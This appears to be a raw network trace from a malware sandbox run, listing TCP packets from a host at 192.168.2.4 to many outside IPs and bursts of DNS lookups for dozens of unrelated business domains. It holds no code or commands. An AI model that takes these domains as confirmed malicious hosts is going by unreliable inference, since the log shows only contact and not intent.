                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.084319115 CEST8050237147.154.3.56192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.096239090 CEST8050237147.154.3.56192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.096364021 CEST5023780192.168.2.4147.154.3.56
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.097004890 CEST8050237147.154.3.56192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.097089052 CEST5023780192.168.2.4147.154.3.56
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.156472921 CEST805023872.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.156594038 CEST5023880192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.173466921 CEST8050239107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.173556089 CEST5023980192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.173995018 CEST5023980192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.226336002 CEST8050235157.112.176.4192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.230401993 CEST5020880192.168.2.496.127.180.42
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.264365911 CEST8050129157.112.176.4192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.264906883 CEST5012980192.168.2.4157.112.176.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.278464079 CEST8050235157.112.176.4192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.278552055 CEST5023580192.168.2.4157.112.176.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303360939 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303415060 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303461075 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303519964 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303594112 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303621054 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303668022 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303669930 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303715944 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303719044 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303719997 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.303777933 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.326443911 CEST5023880192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.333395958 CEST8050239107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.337863922 CEST8050239107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.337954998 CEST5023980192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.349018097 CEST5023980192.168.2.4107.180.98.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.355376959 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.365329981 CEST4992480192.168.2.474.208.236.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.365902901 CEST5024080192.168.2.474.208.236.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.441473007 CEST4974680192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.443111897 CEST5024180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.449181080 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.453227043 CEST5014380192.168.2.4195.78.66.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.494302988 CEST4992580192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.495050907 CEST5024280192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.496318102 CEST805024074.208.236.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.496433020 CEST5024080192.168.2.474.208.236.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.497164965 CEST804992474.208.236.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.506467104 CEST8050239107.180.98.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.540502071 CEST8049746104.143.9.110192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.542103052 CEST8050241104.143.9.110192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.542237043 CEST5024180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.551079988 CEST5024080192.168.2.474.208.236.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.551171064 CEST5024080192.168.2.474.208.236.101
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.551434994 CEST5024180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.586597919 CEST805023872.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.586647987 CEST805023872.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.586683989 CEST805023872.251.233.245192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.586755991 CEST5023880192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.586815119 CEST5023880192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608372927 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608428001 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608478069 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608524084 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608572960 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608633041 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608633041 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608637094 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608674049 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608695030 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608697891 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608752966 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608761072 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.608810902 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.651130915 CEST8050241104.143.9.110192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.662408113 CEST8050241104.143.9.110192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.664978981 CEST5024180192.168.2.4104.143.9.110
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.667947054 CEST5014880192.168.2.4198.100.146.220
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.672555923 CEST8049925173.254.28.29192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.672600985 CEST8050242173.254.28.29192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.672733068 CEST5024280192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.682271957 CEST805024074.208.236.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.682312965 CEST805024074.208.236.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.682348013 CEST805024074.208.236.101192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.709976912 CEST5023880192.168.2.472.251.233.245
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.884298086 CEST5024280192.168.2.4173.254.28.29
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910078049 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910108089 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910126925 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910145998 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910167933 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910190105 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910209894 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:35.910228968 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.670181036 CEST192.168.2.48.8.8.80x1d5fStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.670887947 CEST192.168.2.48.8.8.80x8ea5Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.672966957 CEST192.168.2.48.8.8.80xc799Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.674693108 CEST192.168.2.48.8.8.80xaaf3Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.676616907 CEST192.168.2.48.8.8.80x50b8Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.678750038 CEST192.168.2.48.8.8.80x69afStandard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.680366993 CEST192.168.2.48.8.8.80x6767Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.681756973 CEST192.168.2.48.8.8.80xaf88Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.682667971 CEST192.168.2.48.8.8.80x1b7eStandard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.683300972 CEST192.168.2.48.8.8.80x6bffStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.905489922 CEST192.168.2.48.8.8.80x40a5Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.906049013 CEST192.168.2.48.8.8.80x4cf6Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.164282084 CEST192.168.2.48.8.8.80xd681Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.219552040 CEST192.168.2.48.8.8.80xd26aStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.272684097 CEST192.168.2.48.8.8.80xd92fStandard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.297375917 CEST192.168.2.48.8.8.80xa3f6Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.552324057 CEST192.168.2.48.8.8.80xec9fStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.554575920 CEST192.168.2.48.8.8.80xe80bStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.554709911 CEST192.168.2.48.8.8.80xb769Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.557245970 CEST192.168.2.48.8.8.80xb393Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.696398020 CEST192.168.2.48.8.8.80x5c88Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.696822882 CEST192.168.2.48.8.8.80xf64dStandard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.077034950 CEST192.168.2.48.8.8.80x88a0Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.079399109 CEST192.168.2.48.8.8.80x6bf0Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.084098101 CEST192.168.2.48.8.8.80x94cdStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.087985992 CEST192.168.2.48.8.8.80x640aStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.215703964 CEST192.168.2.48.8.8.80xbbaeStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.220364094 CEST192.168.2.48.8.8.80x7cd8Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.384540081 CEST192.168.2.48.8.8.80x90dStandard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.451992035 CEST192.168.2.48.8.8.80x2fe8Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.455677986 CEST192.168.2.48.8.8.80x196cStandard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.457642078 CEST192.168.2.48.8.8.80xd3cbStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.491579056 CEST192.168.2.48.8.8.80x4132Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.688528061 CEST192.168.2.48.8.8.80xc5f9Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.691203117 CEST192.168.2.48.8.8.80x4e75Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.815404892 CEST192.168.2.48.8.8.80x77bcStandard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:55.819328070 CEST192.168.2.48.8.8.80xd28cStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.603976011 CEST192.168.2.48.8.8.80x34d0Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.604103088 CEST192.168.2.48.8.8.80x5df9Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.606475115 CEST192.168.2.48.8.8.80x754dStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.661242962 CEST192.168.2.48.8.8.80x74a9Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.663223028 CEST192.168.2.48.8.8.80xf44cStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.666389942 CEST192.168.2.48.8.8.80xf9beStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:56.670581102 CEST192.168.2.48.8.8.80x899aStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.303538084 CEST192.168.2.48.8.8.80x529bStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.452311039 CEST192.168.2.48.8.8.80x37a6Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.453387022 CEST192.168.2.48.8.8.80x2ef4Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.458453894 CEST192.168.2.48.8.8.80x54c0Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.458906889 CEST192.168.2.48.8.8.80xeaacStandard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.458945036 CEST192.168.2.48.8.8.80xa8feStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.630146027 CEST192.168.2.48.8.8.80x8e68Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.635163069 CEST192.168.2.48.8.8.80xd4e4Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.951033115 CEST192.168.2.48.8.8.80xee97Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.953738928 CEST192.168.2.48.8.8.80xe525Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:57.954660892 CEST192.168.2.48.8.8.80x5b86Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.048533916 CEST192.168.2.48.8.8.80xfd9dStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.050502062 CEST192.168.2.48.8.8.80x698dStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.067758083 CEST192.168.2.48.8.8.80x2619Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.230067968 CEST192.168.2.48.8.8.80x571Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.425239086 CEST192.168.2.48.8.8.80xb162Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:58.700881958 CEST192.168.2.48.8.8.80xdf17Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.054394007 CEST192.168.2.48.8.8.80xfd9dStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.054471016 CEST192.168.2.48.8.8.80x698dStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.054471016 CEST192.168.2.48.8.8.80x2619Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.068984985 CEST192.168.2.48.8.8.80xda3eStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.210880995 CEST192.168.2.48.8.8.80x7273Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.438811064 CEST192.168.2.48.8.8.80x93eStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.834266901 CEST192.168.2.48.8.8.80x6572Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:59.924757957 CEST192.168.2.48.8.8.80x14acStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.080883026 CEST192.168.2.48.8.8.80x1f1Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.233134031 CEST192.168.2.48.8.8.80x97f9Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.249274969 CEST192.168.2.48.8.8.80xe0b2Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:00.373734951 CEST192.168.2.48.8.8.80x6380Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.162067890 CEST192.168.2.48.8.8.80x4f4aStandard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.389374971 CEST192.168.2.48.8.8.80xa048Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.808490038 CEST192.168.2.48.8.8.80x82c1Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.812639952 CEST192.168.2.48.8.8.80xb430Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:01.813577890 CEST192.168.2.48.8.8.80xcf2fStandard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:02.176043987 CEST192.168.2.48.8.8.80x6317Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:02.178606987 CEST192.168.2.48.8.8.80x4ad5Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:03.064208984 CEST192.168.2.48.8.8.80xbd56Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:03.531725883 CEST192.168.2.48.8.8.80xbe69Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:10.509061098 CEST192.168.2.48.8.8.80x1dc1Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:11.418732882 CEST192.168.2.48.8.8.80x6d63Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:15.108380079 CEST192.168.2.48.8.8.80xce2fStandard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:16.074937105 CEST192.168.2.48.8.8.80x354eStandard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:17.617332935 CEST192.168.2.48.8.8.80xbf2cStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:19.415942907 CEST192.168.2.48.8.8.80x225fStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:19.446095943 CEST192.168.2.48.8.8.80xabb5Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:22.650298119 CEST192.168.2.48.8.8.80x8865Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:22.654534101 CEST192.168.2.48.8.8.80x7814Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:23.017061949 CEST192.168.2.48.8.8.80x5a92Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:23.340060949 CEST192.168.2.48.8.8.80x8466Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:23.934824944 CEST192.168.2.48.8.8.80xeb18Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:26.812146902 CEST192.168.2.48.8.8.80xbabdStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.546111107 CEST192.168.2.48.8.8.80xbb17Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.546189070 CEST192.168.2.48.8.8.80x10e1Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.546806097 CEST192.168.2.48.8.8.80xc87Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.577008963 CEST192.168.2.48.8.8.80x4dc5Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.578895092 CEST192.168.2.48.8.8.80x955Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.579237938 CEST192.168.2.48.8.8.80x3ee9Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.579559088 CEST192.168.2.48.8.8.80xfe9dStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.579977036 CEST192.168.2.48.8.8.80xd217Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.581028938 CEST192.168.2.48.8.8.80xcc74Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.581089020 CEST192.168.2.48.8.8.80xeaeStandard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:27.933985949 CEST192.168.2.48.8.8.80xc1ceStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.000293970 CEST192.168.2.48.8.8.80x7e44Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.006588936 CEST192.168.2.48.8.8.80x970eStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.012624979 CEST192.168.2.48.8.8.80x2aa4Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:43:28.744012117 CEST192.168.2.48.8.8.80x7397Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
